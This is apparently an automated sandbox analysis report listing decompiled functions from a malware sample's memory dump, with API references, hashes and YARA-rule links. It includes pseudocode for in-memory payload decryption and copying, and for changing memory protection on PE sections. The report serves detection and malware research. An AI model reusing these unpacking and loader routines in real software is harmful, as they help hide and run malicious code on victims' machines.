Instruction Fuzzy Hash: 98318131900109AFEB23ABD8DD48EDA7BBDFB54710F0400A6F688AB195DB71DA15DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01009958, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E01009958(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x100d340; // 0x5619918
				_push(0x800);
				_push(0);
				_push( *0x100d238);
				if( *0x100d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x100d24c =  *0x100d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E0100A28E(_t44, _t40); // executed
						_t18 = E01001E09(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x100d24c < 5) {
								 *0x100d24c =  *0x100d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E010014EF();
						RtlFreeHeap( *0x100d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E01005E79(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E01009DB0(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x01009958
0x01009958
0x0100995b
0x0100995c
0x01009966
0x0100996d
0x01009972
0x01009974
0x0100997a
0x010099a2
0x010099ba
0x010099bc
0x010099bd
0x010099bf
0x010099fd
0x010099fd
0x01009a03
0x01009a09
0x01009a09
0x010099c1
0x010099c7
0x010099ca
0x010099d9
0x010099db
0x010099e2
0x01009a16
0x01009a1b
0x01009a1d
0x01009a1f
0x01009a1f
0x00000000
0x01009a1d
0x010099e4
0x010099e9
0x010099f7
0x00000000
0x010099f7
0x010099b1
0x010099b6
0x010099b6
0x00000000
0x010099b6
0x0100997c
0x01009984
0x00000000
0x00000000
0x01009993
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 0100997C

Part of subcall function 01009DB0: GetTickCount.KERNEL32 ref: 01009DC4
Part of subcall function 01009DB0: wsprintfA.USER32 ref: 01009E14
Part of subcall function 01009DB0: wsprintfA.USER32 ref: 01009E31
Part of subcall function 01009DB0: wsprintfA.USER32 ref: 01009E5D
Part of subcall function 01009DB0: HeapFree.KERNEL32(00000000,?), ref: 01009E6F
Part of subcall function 01009DB0: wsprintfA.USER32 ref: 01009E90
Part of subcall function 01009DB0: HeapFree.KERNEL32(00000000,?), ref: 01009EA0
Part of subcall function 01009DB0: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01009ECE
Part of subcall function 01009DB0: GetTickCount.KERNEL32 ref: 01009EDF

RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 0100999A
RtlFreeHeap.NTDLL(00000000,00000002,01007859,?,01007859,00000002,?,?,010019AA,?), ref: 010099F7

Strings

Uxt, xrefs: 010099F7

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID: Uxt
API String ID: 1676223858-1536154274
Opcode ID: 5509912fede88695cacdb173fe1204e1db55319d3ba80eca64b2af8526718da2
Instruction ID: 4aa0cfce8577c1d57775b596fed1169311ae7928d61447dadc6c59ccbd1673b5
Opcode Fuzzy Hash: 5509912fede88695cacdb173fe1204e1db55319d3ba80eca64b2af8526718da2
Instruction Fuzzy Hash: A8217F71201206EBEB239F98D840EDA37ACEB59354F104166F989D7285DB79E940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0100546B, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 010054C8
SysAllocString.OLEAUT32(01009595), ref: 0100550C
SysFreeString.OLEAUT32(00000000), ref: 01005520
SysFreeString.OLEAUT32(00000000), ref: 0100552E

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 6d7bb8ac91f7ddc77dc79ac386a5e0a0ecd2d1e4a3ebf4762fde5c36da19da70
Instruction ID: 10f2a7c18a066d2630967bfb566ad969f9157db95d25db890626494f14bbf1a4
Opcode Fuzzy Hash: 6d7bb8ac91f7ddc77dc79ac386a5e0a0ecd2d1e4a3ebf4762fde5c36da19da70
Instruction Fuzzy Hash: FF314C72900109EFDB16DF98D8948EE7BB9EF08241F10846EFA46EB250E7369641CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E101C4E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E101C4E(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6e104130;
				_t39 = E6E101FDA(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6e104140;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6e1051a7; // 0x6e1051a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6E1015DC(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80, 0x400);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6e104140 = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,6E101DAC,00003000,00000004,?,?,6E101DAC,00000000), ref: 6E101CA4
memcpy.NTDLL(?,?,6E101DAC,?,?,6E101DAC,00000000), ref: 6E101D3B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E101DAC,00000000), ref: 6E101D56

Strings

May 3 2021, xrefs: 6E101CD6

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 3 2021
API String ID: 4010158826-2742910968
Opcode ID: ca8f1f1c2a4c1cf5bacafa307cdf60196957d430e6ba9b7d8b4e0e661c53bb16
Instruction ID: 9817e44024ed5fcfaea1944983f46f00d7775b46efe77252480d2059fc04898d
Opcode Fuzzy Hash: ca8f1f1c2a4c1cf5bacafa307cdf60196957d430e6ba9b7d8b4e0e661c53bb16
Instruction Fuzzy Hash: 03318371E0061A9FDF00CF99C884ADEBBB5FF49308F108129E500BB244DB75AA4ADB90

Uniqueness

Uniqueness Score: -1.00%

Function 01001000, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01001000(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E010098E4(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x0100100c
0x01001010
0x01001011
0x01001012
0x01001014
0x01001016
0x01001019
0x0100101e
0x010010b5
0x010010bc
0x010010bc
0x01001027
0x0100102e
0x0100103e
0x0100103e
0x01001044
0x01001046
0x0100104b
0x01001054
0x0100105a
0x0100105f
0x0100106a
0x0100106e
0x01001070
0x01001071
0x0100107a
0x0100107e
0x0100108f
0x01001080
0x01001085
0x0100108a
0x01001099
0x01001099
0x0100106e
0x0100109f
0x010010a5
0x010010a5
0x010010ae
0x010010b3
0x010010b3
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 0100102E
lstrlenW.KERNEL32(?), ref: 01001064
memcpy.NTDLL(00000000,?,?,?), ref: 01001085
SysFreeString.OLEAUT32(?), ref: 01001099

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: e089244772d9442e05701d2a7018af2e03abb0d16854a7a68eba96d179712cfd
Instruction ID: 8f0352ab651216a7c67c21e25fd217f2b6892d15e2fb2e03b2136cb7889ab2e2
Opcode Fuzzy Hash: e089244772d9442e05701d2a7018af2e03abb0d16854a7a68eba96d179712cfd
Instruction Fuzzy Hash: 58214C75A0020AEFEB12DFA8C98499EBBF4EF49300F1041A9F985A7251EB71DA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0100769A, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0100769A(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E010098E4(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x100c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x100c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x010076a5
0x010076a9
0x010076ab
0x010076ac
0x010076b4
0x010076b4
0x010076b8
0x00000000
0x00000000
0x010076af
0x010076b0
0x010076b3
0x010076b3
0x010076c0
0x010076c5
0x010076cb
0x010076d3
0x010076d9
0x010076db
0x010076e0
0x010076e4
0x010076e6
0x010076e9
0x010076f0
0x010076f0
0x010076fa
0x010076fd
0x010076fe
0x01007700
0x0100770c
0x0100770c
0x01007719

APIs

StrChrA.SHLWAPI(?,00000020,00000000,056195AC,?,01001971,?,01001D89,056195AC,?,01001971), ref: 010076B4
StrTrimA.KERNELBASE(?,0100C2A4,00000002,?,01001971,?,01001D89,056195AC,?,01001971), ref: 010076D3
StrChrA.SHLWAPI(?,00000020,?,01001971,?,01001D89,056195AC,?,01001971), ref: 010076DE
StrTrimA.SHLWAPI(00000001,0100C2A4,?,01001971,?,01001D89,056195AC,?,01001971), ref: 010076F0

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 983f07f03a2e985c45fd867f6ccc32cebd3272ffd6bbe09ce8be527166926742
Instruction ID: 13e0a41d75aeeca8902a7300207cbb542e32ecf28f1ffe88d72eaee02eb6f122
Opcode Fuzzy Hash: 983f07f03a2e985c45fd867f6ccc32cebd3272ffd6bbe09ce8be527166926742
Instruction Fuzzy Hash: AB0196716053116BE2239A5D8C48F2B7FD8EB45A90F110558F9C6C7281DA65D80187B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E101367, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E101367(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E101D6E(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e101370
0x6e101375
0x6e101383
0x6e101388
0x6e101388
0x6e10138e
0x6e101393
0x6e101397
0x6e10139b
0x6e10139b
0x6e1013a5
0x6e1013ae

APIs

GetCurrentThread.KERNEL32 ref: 6E10136A
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E101375
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E101388
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E10139B

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 51716a40f273f46a5f0843026c3e12506e1fc49b44695e2dee4fbb57ebdac87e
Instruction ID: 8e40fa8d76fa2d5a599a57f70c8ed44093b4e802159f825525c58a042b8b4017
Opcode Fuzzy Hash: 51716a40f273f46a5f0843026c3e12506e1fc49b44695e2dee4fbb57ebdac87e
Instruction Fuzzy Hash: E2E022303076116FE6016B684C88E6F776CEFA2334711833AF821D22D0CF648C06AAB0

Uniqueness

Uniqueness Score: -1.00%

Function 01005DFD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01005DFD(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E01008ECC(0, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E01008DF5(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E01005C3B(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x100d238, 0, _t25);
				}
				return _t22;
			}

0x01005dfd
0x01005e10
0x01005e14
0x01005e6f
0x01005e16
0x01005e1d
0x01005e25
0x01005e28
0x01005e2d
0x01005e31
0x01005e37
0x01005e3f
0x01005e42
0x01005e5a
0x01005e5a
0x01005e65
0x01005e65
0x01005e76

APIs

Part of subcall function 01008ECC: lstrlen.KERNEL32(?,00000000,0100D330,00000001,0100577D,0100D00C,0100D00C,00000000,00000005,00000000,00000000,?,?,?,01008880,0100197C), ref: 01008ED5
Part of subcall function 01008ECC: mbstowcs.NTDLL ref: 01008EFC
Part of subcall function 01008ECC: memset.NTDLL ref: 01008F0E

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,0561937C), ref: 01005E37
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,0561937C), ref: 01005E65

Strings

Uxt, xrefs: 01005E65

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uxt
API String ID: 1500278894-1536154274
Opcode ID: 70ebe85df12e7190ec3999f2f611a730033fbf85465669947939c3beac59c8b7
Instruction ID: 2eb1483c8b9535e06b5268a3b269ab83bcf78f5c39bf0d1a64eb18178902725d
Opcode Fuzzy Hash: 70ebe85df12e7190ec3999f2f611a730033fbf85465669947939c3beac59c8b7
Instruction Fuzzy Hash: BE01D43160024ABBEB235FA89C44F9F7BB8FF88714F504526FA809A090EA71DD54CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1010AD, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1010AD(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e104140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e1010b7
0x6e1010c4
0x6e1010ca
0x6e1010d6
0x6e1010e6
0x6e1010e8
0x6e1010f0
0x6e101185
0x6e10118c
0x00000000
0x00000000
0x00000000
0x6e1010f6
0x6e1010f6
0x6e1010f6
0x6e1010fa
0x00000000
0x00000000
0x6e101106
0x6e10110a
0x6e10112e
0x6e101132
0x6e101146
0x6e101146
0x6e10114c
0x6e10115b
0x6e10115f
0x6e101167
0x6e101167
0x6e10116f
0x6e101172
0x6e10117f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e10117f
0x6e10113a
0x6e10113e
0x6e101144
0x00000000
0x00000000
0x00000000
0x6e101144
0x6e101112
0x6e101116
0x6e101120
0x6e101118
0x6e101118
0x6e101118
0x00000000
0x6e101116
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1010E6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E10115B
GetLastError.KERNEL32 ref: 6E101161

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: b899a02b0622569c9b61dc0ce52e2fb29ade357ccb55ca74d21a61b178b19d5d
Instruction ID: 1ddc45a6eda550e797ad21f2275e7cc18172364bfbbe639782a8b949d6a55856
Opcode Fuzzy Hash: b899a02b0622569c9b61dc0ce52e2fb29ade357ccb55ca74d21a61b178b19d5d
Instruction Fuzzy Hash: 8A216031A0120BEFDB14CFA5C481AAAF7F5FF08319F008859D50297445EBBCAA99DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01001E40, Relevance: 3.9, APIs: 3, Instructions: 155
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E01001E40(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x100d2a4; // 0x460a5a8
				_t5 = _t40 + 0x100ee40; // 0x410025
				_t85 = E0100771C(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E01005DE8(_v16);
					goto L24;
				}
				if(E01004EC8(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E01008ECC(0,  *0x100d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x100d2a4; // 0x460a5a8
					_t11 = _t52 + 0x100e81a; // 0x65696c43
					_t55 = E01008ECC(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E0100386E(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E01005DE8(_t87);
					}
					if(_t80 != 0) {
						L17:
						E01005DE8(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E01009D8B(_t86);
						}
						goto L22;
					} else {
						if(( *0x100d260 & 0x00000001) == 0) {
							L14:
							E010010D9(_v84, _v88, _v88,  *0x100d270, 0);
							_t80 = E0100656F(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E01009306( &_v40, 0);
							}
							E01005DE8(_v88);
							goto L17;
						}
						_t67 =  *0x100d2a4; // 0x460a5a8
						_t18 = _t67 + 0x100e823; // 0x65696c43
						_t70 = E01008ECC(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E0100386E(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E01005DE8(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x01001e52
0x01001e55
0x01001e5c
0x01001e62
0x01001e63
0x01001e64
0x01001e65
0x01001e66
0x01001e67
0x01001e6f
0x01001e7b
0x01001e7d
0x01001e82
0x01001fd1
0x01001fd4
0x01001fd8
0x01001fd8
0x01001e94
0x01001e9c
0x01001fc4
0x01001fc5
0x01001fc8
0x00000000
0x01001fc8
0x01001eae
0x01001eb0
0x01001eb0
0x01001ebb
0x01001ec0
0x01001ec5
0x01001fb3
0x00000000
0x01001ecb
0x01001ecb
0x01001ed0
0x01001ed9
0x01001ede
0x01001ee7
0x01001f0a
0x01001ee9
0x01001eff
0x01001f01
0x01001f01
0x01001f0d
0x01001fa7
0x01001faa
0x01001fb4
0x01001fb4
0x01001fb9
0x01001fbb
0x01001fbb
0x00000000
0x01001f13
0x01001f1a
0x01001f5b
0x01001f6b
0x01001f81
0x01001f85
0x01001f8a
0x01001f90
0x01001f9d
0x01001f9d
0x01001fa2
0x00000000
0x01001fa2
0x01001f1c
0x01001f21
0x01001f2a
0x01001f2f
0x01001f33
0x01001f56
0x01001f35
0x01001f4b
0x01001f4d
0x01001f4d
0x01001f59
0x00000000
0x00000000
0x00000000
0x00000000
0x01001f59
0x01001f0d

APIs

memset.NTDLL ref: 01001E55

Part of subcall function 0100771C: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,01001E7B,00410025,00000005,?,00000000), ref: 0100772D
Part of subcall function 0100771C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0100774A

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 01001E89
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 01001E94

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: 4ee5f291b35a1f5c1e233572e0bab9f584069b087b05a8eea8ffffe6ff20379c
Instruction ID: 4ff7cf157779f6052b2103d327539baeb2a0c2a5922fa6d0d6ed67f37eba445a
Opcode Fuzzy Hash: 4ee5f291b35a1f5c1e233572e0bab9f584069b087b05a8eea8ffffe6ff20379c
Instruction Fuzzy Hash: 88414172900219ABEB13EFE4CD84DEE7BEDAF14300F104566E685EB184D775DA458B90

